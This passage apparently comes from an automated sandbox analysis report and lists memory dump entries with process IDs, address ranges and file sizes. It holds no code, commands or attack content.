                                                                                                                                                                                                                                                        • memory/6544-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                        • memory/6552-574-0x0000000005AD0000-0x0000000005AD1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/6576-570-0x0000000005A50000-0x0000000005A51000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/6604-586-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/6624-559-0x0000000004B82000-0x0000000004B83000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/6720-591-0x00000000057E0000-0x00000000057E1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                        • memory/6820-564-0x0000000004FB0000-0x00000000055C8000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                                                        • memory/6912-579-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          32KB

                                                                                                                                                                                                                                                        • memory/7068-462-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4KB